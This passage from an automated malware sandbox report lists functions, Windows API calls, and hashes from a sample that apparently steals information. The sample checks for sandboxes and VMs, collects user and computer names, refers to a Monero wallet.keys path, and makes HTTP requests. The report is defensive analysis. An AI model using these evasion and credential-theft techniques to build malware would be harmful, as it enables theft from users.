135a16-135a21 Sleep 1172->1201 1202 135a28-135a91 call 13a8a0 call 13a820 * 2 call 121670 call 13a800 * 4 call 136560 call 121550 1172->1202 1179->1172 1275 13594a-13598a call 13a7a0 call 121590 call 1351f0 call 13a8a0 call 13a800 1179->1275 1180->1172 1201->1106 1202->1270 1250->1144 1275->1172
                          APIs
                            • Part of subcall function 0013A820: lstrlen.KERNEL32(00124F05,?,?,00124F05,00140DDE), ref: 0013A82B
                            • Part of subcall function 0013A820: lstrcpy.KERNEL32(00140DDE,00000000), ref: 0013A885
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00135644
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001356A1
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00135857
                            • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                            • Part of subcall function 001351F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00135228
                            • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                            • Part of subcall function 001352C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00135318
                            • Part of subcall function 001352C0: lstrlen.KERNEL32(00000000), ref: 0013532F
                            • Part of subcall function 001352C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00135364
                            • Part of subcall function 001352C0: lstrlen.KERNEL32(00000000), ref: 00135383
                            • Part of subcall function 001352C0: lstrlen.KERNEL32(00000000), ref: 001353AE
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0013578B
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00135940
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00135A0C
                          • Sleep.KERNEL32(0000EA60), ref: 00135A1B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen$Sleep
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                          • API String ID: 507064821-2791005934
                          • Opcode ID: 3e830f7dcdc878cd96d82759de47098a3a68cf50f4b70a0afcd2d0ae310a3260
                          • Instruction ID: 787898088135a3db7e1750242254ba1695c8743b4c7786d93a6bfaaa8d38b919
                          • Opcode Fuzzy Hash: 3e830f7dcdc878cd96d82759de47098a3a68cf50f4b70a0afcd2d0ae310a3260
                          • Instruction Fuzzy Hash: B6E15F72910504AADB09FBA0EC92AED737DAF74300F908168F54767191EF746B09CBA2
                          Function 001317A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1301 1317a0-1317cd call 13aad0 StrCmpCA 1304 1317d7-1317f1 call 13aad0 1301->1304 1305 1317cf-1317d1 ExitProcess 1301->1305 1309 1317f4-1317f8 1304->1309 1310 1319c2-1319cd call 13a800 1309->1310 1311 1317fe-131811 1309->1311 1313 131817-13181a 1311->1313 1314 13199e-1319bd 1311->1314 1316 131913-131924 StrCmpCA 1313->1316 1317 131932-131943 StrCmpCA 1313->1317 1318 1318f1-131902 StrCmpCA 1313->1318 1319 131951-131962 StrCmpCA 1313->1319 1320 131970-131981 StrCmpCA 1313->1320 1321 131835-131844 call 13a820 1313->1321 1322 13187f-131890 StrCmpCA 1313->1322 1323 13185d-13186e StrCmpCA 1313->1323 1324 131821-131830 call 13a820 1313->1324 1325 131849-131858 call 13a820 1313->1325 1326 1318cf-1318e0 StrCmpCA 1313->1326 1327 13198f-131999 call 13a820 1313->1327 1328 1318ad-1318be StrCmpCA 1313->1328 1314->1309 1331 131930 1316->1331 1332 131926-131929 1316->1332 1333 131945-131948 1317->1333 1334 13194f 1317->1334 1329 131904-131907 1318->1329 1330 13190e 1318->1330 1335 131964-131967 1319->1335 1336 13196e 1319->1336 1338 131983-131986 1320->1338 1339 13198d 1320->1339 1321->1314 1346 131892-13189c 1322->1346 1347 13189e-1318a1 1322->1347 1344 131870-131873 1323->1344 1345 13187a 1323->1345 1324->1314 1325->1314 1350 1318e2-1318e5 1326->1350 1351 1318ec 1326->1351 1327->1314 1348 1318c0-1318c3 1328->1348 1349 1318ca 1328->1349 1329->1330 1330->1314 1331->1314 1332->1331 1333->1334 1334->1314 1335->1336 1336->1314 1338->1339 1339->1314 1344->1345 1345->1314 1355 1318a8 1346->1355 1347->1355 1348->1349 1349->1314 1350->1351 1351->1314 1355->1314
                          APIs
                          • StrCmpCA.SHLWAPI(00000000,block), ref: 001317C5
                          • ExitProcess.KERNEL32 ref: 001317D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: block
                          • API String ID: 621844428-2199623458
                          • Opcode ID: 382523dd1a9db8c2c03b47c66574f14cb24a0421badc8a107818aa168ef7a76f
                          • Instruction ID: 035e4173c95daa71396006c55de41b36514030f319c056a5c3297683b187604e
                          • Opcode Fuzzy Hash: 382523dd1a9db8c2c03b47c66574f14cb24a0421badc8a107818aa168ef7a76f
                          • Instruction Fuzzy Hash: 08516CB4A0420AFFCB05DFA5D954FBE77BABF44708F108048E906A7251D770E955CB62
                          Function 00137500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1356 137500-13754a GetWindowsDirectoryA 1357 137553-1375c7 GetVolumeInformationA call 138d00 * 3 1356->1357 1358 13754c 1356->1358 1365 1375d8-1375df 1357->1365 1358->1357 1366 1375e1-1375fa call 138d00 1365->1366 1367 1375fc-137617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 137619-137626 call 13a740 1367->1369 1370 137628-137658 wsprintfA call 13a740 1367->1370 1377 13767e-13768e 1369->1377 1370->1377
                          APIs
                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00137542
                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0013757F
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00137603
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0013760A
                          • wsprintfA.USER32 ref: 00137640
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                          • String ID: :$C$\
                          • API String ID: 1544550907-3809124531
                          • Opcode ID: 46aac63e56c3fe17d35cc860767307d687531225c244122bcce7d8c8e58a2fc5
                          • Instruction ID: ede9c1bf8640516abd16cb24e6c92e60d151b00b0f62aea76d668c7d3c25f21b
                          • Opcode Fuzzy Hash: 46aac63e56c3fe17d35cc860767307d687531225c244122bcce7d8c8e58a2fc5
                          • Instruction Fuzzy Hash: 904180F1D04248ABDB25DF94DC85BEEBBB8AF18700F104199F509B7280DB75AA44CFA5
                          Function 001369F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00139860: GetProcAddress.KERNEL32(76210000,00F01540), ref: 001398A1
                            • Part of subcall function 00139860: GetProcAddress.KERNEL32(76210000,00F01420), ref: 001398BA
                            • Part of subcall function 00139860: GetProcAddress.KERNEL32(76210000,00F01450), ref: 001398D2
                            • Part of subcall function 00139860: GetProcAddress.KERNEL32(76210000,00F01438), ref: 001398EA
                            • Part of subcall function 00139860: GetProcAddress.KERNEL32(76210000,00F014B0), ref: 00139903
                            • Part of subcall function 00139860: GetProcAddress.KERNEL32(76210000,00F099B8), ref: 0013991B
                            • Part of subcall function 00139860: GetProcAddress.KERNEL32(76210000,00EF5730), ref: 00139933
                            • Part of subcall function 00139860: GetProcAddress.KERNEL32(76210000,00EF57F0), ref: 0013994C
                            • Part of subcall function 00139860: GetProcAddress.KERNEL32(76210000,00F01558), ref: 00139964
                            • Part of subcall function 00139860: GetProcAddress.KERNEL32(76210000,00F01480), ref: 0013997C
                            • Part of subcall function 00139860: GetProcAddress.KERNEL32(76210000,00F015A0), ref: 00139995
                            • Part of subcall function 00139860: GetProcAddress.KERNEL32(76210000,00F01498), ref: 001399AD
                            • Part of subcall function 00139860: GetProcAddress.KERNEL32(76210000,00EF5AB0), ref: 001399C5
                            • Part of subcall function 00139860: GetProcAddress.KERNEL32(76210000,00F01600), ref: 001399DE
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                            • Part of subcall function 001211D0: ExitProcess.KERNEL32 ref: 00121211
                            • Part of subcall function 00121160: GetSystemInfo.KERNEL32(?), ref: 0012116A
                            • Part of subcall function 00121160: ExitProcess.KERNEL32 ref: 0012117E
                            • Part of subcall function 00121110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0012112B
                            • Part of subcall function 00121110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00121132
                            • Part of subcall function 00121110: ExitProcess.KERNEL32 ref: 00121143
                            • Part of subcall function 00121220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0012123E
                            • Part of subcall function 00121220: ExitProcess.KERNEL32 ref: 00121294
                            • Part of subcall function 00136770: GetUserDefaultLangID.KERNEL32 ref: 00136774
                            • Part of subcall function 00121190: ExitProcess.KERNEL32 ref: 001211C6
                            • Part of subcall function 00137850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001211B7), ref: 00137880
                            • Part of subcall function 00137850: RtlAllocateHeap.NTDLL(00000000), ref: 00137887
                            • Part of subcall function 00137850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0013789F
                            • Part of subcall function 001378E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00137910
                            • Part of subcall function 001378E0: RtlAllocateHeap.NTDLL(00000000), ref: 00137917
                            • Part of subcall function 001378E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0013792F
                            • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                            • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                            • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                            • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00F099A8,?,0014110C,?,00000000,?,00141110,?,00000000,00140AEF), ref: 00136ACA
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00136AE8
                          • CloseHandle.KERNEL32(00000000), ref: 00136AF9
                          • Sleep.KERNEL32(00001770), ref: 00136B04
                          • CloseHandle.KERNEL32(?,00000000,?,00F099A8,?,0014110C,?,00000000,?,00141110,?,00000000,00140AEF), ref: 00136B1A
                          • ExitProcess.KERNEL32 ref: 00136B22
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                          • String ID:
                          • API String ID: 2931873225-0
                          • Opcode ID: e40e7268f7035c3b20318134e1674e3621ae596cf9283633cb49a53ef8abf238
                          • Instruction ID: 3383cd6d65cac6920b2869dbf17842652e12575b2241996106d8b56cf6132163
                          • Opcode Fuzzy Hash: e40e7268f7035c3b20318134e1674e3621ae596cf9283633cb49a53ef8abf238
                          • Instruction Fuzzy Hash: FB312C71940208BBDB05FBF0DC56BEE7778AF24700F908518F252B6192DFB06A05CBA2
                          Function 00136AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1436 136af3 1437 136b0a 1436->1437 1439 136aba-136ad7 call 13aad0 OpenEventA 1437->1439 1440 136b0c-136b22 call 136920 call 135b10 CloseHandle ExitProcess 1437->1440 1446 136af5-136b04 CloseHandle Sleep 1439->1446 1447 136ad9-136af1 call 13aad0 CreateEventA 1439->1447 1446->1437 1447->1440
                          APIs
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00F099A8,?,0014110C,?,00000000,?,00141110,?,00000000,00140AEF), ref: 00136ACA
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00136AE8
                          • CloseHandle.KERNEL32(00000000), ref: 00136AF9
                          • Sleep.KERNEL32(00001770), ref: 00136B04
                          • CloseHandle.KERNEL32(?,00000000,?,00F099A8,?,0014110C,?,00000000,?,00141110,?,00000000,00140AEF), ref: 00136B1A
                          • ExitProcess.KERNEL32 ref: 00136B22
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                          • String ID:
                          • API String ID: 941982115-0
                          • Opcode ID: a742b5645727437cde0d43c0227ec0c295b8649f2a6a5e99fd5a9153ee2a599e
                          • Instruction ID: a5596bbc9c0339a73978337f60cf2fa5bb22aa0307e1a7ee3d63dda9ebe7cdef
                          • Opcode Fuzzy Hash: a742b5645727437cde0d43c0227ec0c295b8649f2a6a5e99fd5a9153ee2a599e
                          • Instruction Fuzzy Hash: 7DF0D470A40219BBE711ABA0DC1ABBEBA78EB14701F10C914F513A61D5DBF05540EAA6
                          Function 001247B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00124839
                          • InternetCrackUrlA.WININET(00000000,00000000), ref: 00124849
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CrackInternetlstrlen
                          • String ID: <
                          • API String ID: 1274457161-4251816714
                          • Opcode ID: f20ea9da08eaa489956a5a13b7fb8123f51301c86b5865823a4a9277baadca93
                          • Instruction ID: 135e6b6e107f05b352a03380494ddc63b372b4813295bad8482903da554fb2f5
                          • Opcode Fuzzy Hash: f20ea9da08eaa489956a5a13b7fb8123f51301c86b5865823a4a9277baadca93
                          • Instruction Fuzzy Hash: 81214DB1D00209ABDF14DFA4E845ADE7B78FF44320F108625F965A72C0EB706A09CF91
                          Function 001351F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                            • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                            • Part of subcall function 00126280: InternetOpenA.WININET(00140DFE,00000001,00000000,00000000,00000000), ref: 001262E1
                            • Part of subcall function 00126280: StrCmpCA.SHLWAPI(?,00F0F920), ref: 00126303
                            • Part of subcall function 00126280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00126335
                            • Part of subcall function 00126280: HttpOpenRequestA.WININET(00000000,GET,?,00F0EFA8,00000000,00000000,00400100,00000000), ref: 00126385
                            • Part of subcall function 00126280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001263BF
                            • Part of subcall function 00126280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001263D1
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00135228
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                          • String ID: ERROR$ERROR
                          • API String ID: 3287882509-2579291623
                          • Opcode ID: c793f7c4ee09193e316e1f44dca8be6265fc72a14a97ddfaf578c27e8aa22e47
                          • Instruction ID: 8d83b94216ccbabed5cbd3ed538a7aeae1920419d82aacaae602f5dc2eb57580
                          • Opcode Fuzzy Hash: c793f7c4ee09193e316e1f44dca8be6265fc72a14a97ddfaf578c27e8aa22e47
                          • Instruction Fuzzy Hash: 08111231910148BBDB14FF74ED92AED7739AF60300FC04158F85A5B592EF31AB15CA91
                          Function 00121220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1493 121220-121247 call 1389b0 GlobalMemoryStatusEx 1496 121273-12127a 1493->1496 1497 121249-121271 call 13da00 * 2 1493->1497 1498 121281-121285 1496->1498 1497->1498 1501 121287 1498->1501 1502 12129a-12129d 1498->1502 1504 121292-121294 ExitProcess 1501->1504 1505 121289-121290 1501->1505 1505->1502 1505->1504
                          APIs
                          • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0012123E
                          • ExitProcess.KERNEL32 ref: 00121294
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
